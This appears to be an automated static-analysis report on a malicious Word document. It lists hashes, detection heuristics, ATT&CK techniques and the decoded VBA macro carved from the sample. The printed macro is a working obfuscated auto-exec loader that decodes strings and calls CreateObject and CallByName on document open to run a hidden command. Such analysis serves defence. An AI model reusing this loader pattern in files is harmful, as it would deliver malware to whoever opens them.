Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7e26e15cc181d3ca…

MALICIOUS

Office (OLE)

36.5 KB Created: 2018-10-28 22:33:00 Authoring application: Microsoft Office Word First seen: 2020-04-06
MD5: 441e1f32c93a73ea3dd3ad1951867dec SHA-1: 9daa0fedc53972fce95b11394b8a9ee368c59130 SHA-256: 7e26e15cc181d3caec107bfd274e596064eef94dc11b3abde6738b53a0b6cd5b
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains obfuscated VBA macros, including an auto-executing Document_Open subroutine. This macro utilizes CreateObject and CallByName, indicative of attempts to execute arbitrary code. The ClamAV detection 'Doc.Malware.Valyria-6749505-0' further supports its malicious nature. The primary function of the VBA script appears to be downloading and executing a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Malware.Valyria-6749505-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6749505-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4117 bytes
SHA-256: adcb37c7f56ad4b222dcbc0b5062ec957cd622639c45f03821a89196acc41f32
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Function UOs_tIA(ByVal J_H As String)
Dim b_slV As String: Dim m_ik As Long: For m_ik = 1 To Len(J_H) Step 2: b_slV = b_slV & Chr(Val(Chr(23 + (9 * 2) - (1 * 3)) & Chr((20 * 3) + 16 - (24 / 2) + 8) & Mid(J_H, m_ik, 2)) - 31): Next: UOs_tIA = b_slV
End Function
Sub Document_Open()
Dim vSKrbYF_pczSQJnVW As Long: vSKrbYF_pczSQJnVW = 2
Dim xttL_cladmGvk As Long
Select Case vSKrbYF_pczSQJnVW
Case 48 - (68 + 82) - 61 Xor Round(4159 Xor 4344) Xor 79
xttL_cladmGvk = 8275 Xor 43
Case 41 Xor Round(2702 Xor 826) Xor 99 / Round(71 * 30 / 58) / 34 / Round(89 * 15 / 11) / 42
xttL_cladmGvk = 1282 * 33
Case 15 + (67 - 63) + 73 + (11 - 56) + 68
xttL_cladmGvk = 9183 + 78
Case 48 / Round(97 * 61 / 11) / 40 + (85 - 73) + 18 * Round(30 / 80 - 17) * 77
xttL_cladmGvk = 1387 + 41
Case 93 + (56 - 78) + 96 Xor Round(4979 Xor 1582) Xor 75
xttL_cladmGvk = 3328 Xor 35
Case 12 / Round(56 * 78 / 9) / 33 * Round(34 / 88 - 15) * 30
xttL_cladmGvk = 5691 * 16
Case 72 * Round(55 / 62 - 44) * 62 / Round(86 * 81 / 42) / 89 / Round(60 * 84 / 18) / 40
xttL_cladmGvk = 8756 Xor 12
Case 95 + (51 - 68) + 80 + (9 - 35) + 31 / Round(57 * 50 / 38) / 93
xttL_cladmGvk = 2725 * 87
Case 45 - (70 + 43) - 55 - (20 + 79) - 65
xttL_cladmGvk = 5109 + 36
Case 34 + (66 - 41) + 62 + (90 - 36) + 68
xttL_cladmGvk = 8400 + 67
Case 56 + (13 - 27) + 98 + (93 - 78) + 24
xttL_cladmGvk = 35 * 98
Case 10 * Round(43 / 29 - 30) * 86 * Round(17 / 79 - 16) * 86
xttL_cladmGvk = 3074 Xor 21
Case 65 + (31 - 92) + 35 + (73 - 62) + 47
xttL_cladmGvk = 1586 - 38
Case 99 * Round(32 / 45 - 35) * 90 / Round(18 * 28 / 39) / 35 * Round(24 / 40 - 9) * 91
xttL_cladmGvk = 2848 / 90
Case 88 * Round(32 / 44 - 40) * 93 / Round(57 * 28 / 30) / 46 * Round(38 / 92 - 78) * 68
xttL_cladmGvk = 751 + 78
Case 23 / Round(24 * 51 / 22) / 10 + (40 - 44) + 31 / Round(89 * 32 / 24) / 83
xttL_cladmGvk = 7049 * 27
Case 52 * Round(32 / 58 - 19) * 16 / Round(45 * 57 / 18) / 21 / Round(93 * 64 / 56) / 99
xttL_cladmGvk = 606 * 40
Case 2:
CallByName CreateObject(UOs_tIA("76728291888F934D7287848B8B")), UOs_tIA("71948D"), VbMethod, UOs_tIA(ActiveDocument.Variables("ZEUQO").Value), 0, True
Case 88 / Round(32 * 62 / 9) / 53 * Round(35 / 77 - 89) * 89
xttL_cladmGvk = 985 + 25
Case 85 * Round(77 / 70 - 46) * 90 - (55 + 23) - 72 + (10 - 97) + 69
xttL_cladmGvk = 4027 Xor 18
Case 12 / Round(35 * 9 / 12) / 74 Xor Round(4579 Xor 5285) Xor 80 - (78 + 20) - 74
xttL_cladmGvk = 3409 / 78
Case 81 - (72 + 88) - 92 - (71 + 34) - 61
xttL_cladmGvk = 1783 - 17
Case 46 - (26 + 66) - 31 - (59 + 71) - 28 + (27 - 57) + 52
xttL_cladmGvk = 548 - 87
Case 37 Xor Round(1302 Xor 3020) Xor 29 - (13 + 21) - 44
xttL_cladmGvk = 3224 Xor 56
Case 60 * Round(97 / 16 - 21) * 25 - (43 + 52) - 77
xttL_cladmGvk = 7582 + 10
Case 43 / Round(49 * 93 / 20) / 10 + (54 - 58) + 83 / Round(44 * 10 / 18) / 14
xttL_cladmGvk = 7469 Xor 92
Case 99 + (20 - 77) + 86 - (9 + 43) - 81 / Round(85 * 94 / 67) / 30
xttL_cladmGvk = 6978 + 67
Case 89 / Round(17 * 75 / 99) / 77 - (40 + 50) - 93 - (93 + 9) - 33
xttL_cladmGvk = 8268 - 58
Case 74 / Round(24 * 23 / 47) / 51 + (84 - 57) + 41
xttL_cladmGvk = 2410 - 68
Case 19 * Round(24 / 49 - 55) * 80 * Round(74 / 29 - 33) * 44
xttL_cladmGvk = 3400 + 49
Case 13 * Round(84 / 39 - 96) * 93 / Round(45 * 38 / 20) / 69 / Round(32 * 80 / 81) / 97
xttL_cladmGvk = 2550 + 88
Case 60 - (9 + 77) - 67 - (78 + 30) - 40
xttL_cladmGvk = 5107 - 21
Case 31 Xor Round(1952 Xor 4994) Xor 52 / Round(68 * 20 / 46) / 60
xttL_cladmGvk = 1671 / 89
Case 59 / Round(74 * 92 / 51) / 98 + (41 - 48) + 32
xttL_cladmGvk = 6502 * 68
Case 11 - (53 + 25) - 17 / Round(41 * 65 / 30) / 62
xttL_cladmGvk = 5452 * 51
Case 9 * Round(90 / 38 - 77) * 90 / Round(19 * 65 / 41) / 32
xttL_cladmGvk = 8327 Xor 78
End
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.